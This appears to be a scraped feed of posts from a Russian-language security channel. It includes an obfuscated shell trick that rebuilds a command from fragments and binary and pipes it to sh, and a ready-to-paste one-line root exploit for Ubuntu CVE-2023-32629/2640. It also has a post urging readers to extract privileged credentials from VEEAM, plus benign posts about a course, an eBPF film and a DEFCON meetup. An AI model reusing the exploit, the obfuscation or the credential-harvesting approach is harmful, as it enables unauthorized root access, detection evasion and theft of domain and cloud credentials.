parts=(" /" "us" ";r" " /" ";b" "in" "; /" "who" "a" "mi" "")
command="${parts[0]}${parts[1]}${parts[2]}${parts[3]}${parts[4]}${parts[5]}${parts[6]}${parts[7]}${parts[8]}${parts[9]}${parts[10]}"
echo $command | tr -d ' ;' | sh
echo "00101111 01110101 01110011 01110010 00101111 01100010 01101001 01101110 00101111 01110111 01101000 01101111 01100001 01101101 01101001" | perl -lape '$_=pack"(B8)*",@F
' | sh👍31😱3
VEEAM 😋
Это кладезь привилегированных учетных записей (AD, Linux, Cloud)
Лежат себе плохо привинченные, осталось только забрать.
В общем читаем и погружаемся:
1 - From VEEAM to Domain Administrator
2 - Decrypting VEEAM Passwords
3 - Используем тулзу SharpVeeamDecryptor
#veeam #passwd
Это кладезь привилегированных учетных записей (AD, Linux, Cloud)
Лежат себе плохо привинченные, осталось только забрать.
В общем читаем и погружаемся:
1 - From VEEAM to Domain Administrator
2 - Decrypting VEEAM Passwords
3 - Используем тулзу SharpVeeamDecryptor
#veeam #passwd
🔥18😱4
Сезон охоты за киберугрозами открыт. Получите навыки выявления аномалий в инфраструктуре с помощью формулировки гипотез и их дальнейшей проверки.
Идет набор на практический курс по поиску киберугроз Threat Hunting, вы научитесь:
— выявлять аномалии на хосте и в сетевом трафике, которые не были задетектированы стандартными средствами защиты;
— отличать аномалии от легитимного поведения;
— понимать мышление злоумышленника;
— формулировать и проверять гипотезы о киберугрозах.
Кстати, начать можете бесплатно — чтобы оценить, насколько вам подходит формат обучения.
Идет набор на практический курс по поиску киберугроз Threat Hunting, вы научитесь:
— выявлять аномалии на хосте и в сетевом трафике, которые не были задетектированы стандартными средствами защиты;
— отличать аномалии от легитимного поведения;
— понимать мышление злоумышленника;
— формулировать и проверять гипотезы о киберугрозах.
Кстати, начать можете бесплатно — чтобы оценить, насколько вам подходит формат обучения.
🔥12👍1
CVE-2023-32629 и CVE-2023-2640
Ubuntu Privilege Escalation
*
BASH одной строкой:
#ubuntu #lpe
Ubuntu Privilege Escalation
*
BASH одной строкой:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/;setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*; python3 -c 'import os;os.setuid(0);os.system(\"/bin/bash\")'"#ubuntu #lpe
🔥38👍2
Это круто
Студия Speakeasy Productions сняла и опубликовала в открытом доступе документальный фильм
"eBPF: Unlocking the Kernel"
Студия Speakeasy Productions сняла и опубликовала в открытом доступе документальный фильм
"eBPF: Unlocking the Kernel"
YouTube
eBPF: Unlocking the Kernel [OFFICIAL DOCUMENTARY]
The official eBPF documentary.
In 2014, a group of engineers at Plumgrid needed to find an innovative and cost-effective solution to handle network traffic in SDN environments. What they created was a landmark in the industry known as the extended Berkeley…
In 2014, a group of engineers at Plumgrid needed to find an innovative and cost-effective solution to handle network traffic in SDN environments. What they created was a landmark in the industry known as the extended Berkeley…
👍16👌2🔥1
Напоминаем !
Завтра пройдет встреча DEFCON Russia
*
* Где: в самокатошной - Санкт-Петербург, ул. Малая Монетная, дом 2, литер Г, 6 этаж, БЦ «Лангензипен»
* Во сколько: 17 ноября 2023 c 18:00 до 21:30 (сбор на пожрать и скинуть тулуп с 17 00)
* Формат: офлайн + онлайн-трансляция
* зарегистрироваться
*
Приходите, пообщаемся 😜
#defcon #spb
Завтра пройдет встреча DEFCON Russia
*
* Где: в самокатошной - Санкт-Петербург, ул. Малая Монетная, дом 2, литер Г, 6 этаж, БЦ «Лангензипен»
* Во сколько: 17 ноября 2023 c 18:00 до 21:30 (сбор на пожрать и скинуть тулуп с 17 00)
* Формат: офлайн + онлайн-трансляция
* зарегистрироваться
*
Приходите, пообщаемся 😜
#defcon #spb
👍8🔥4😱1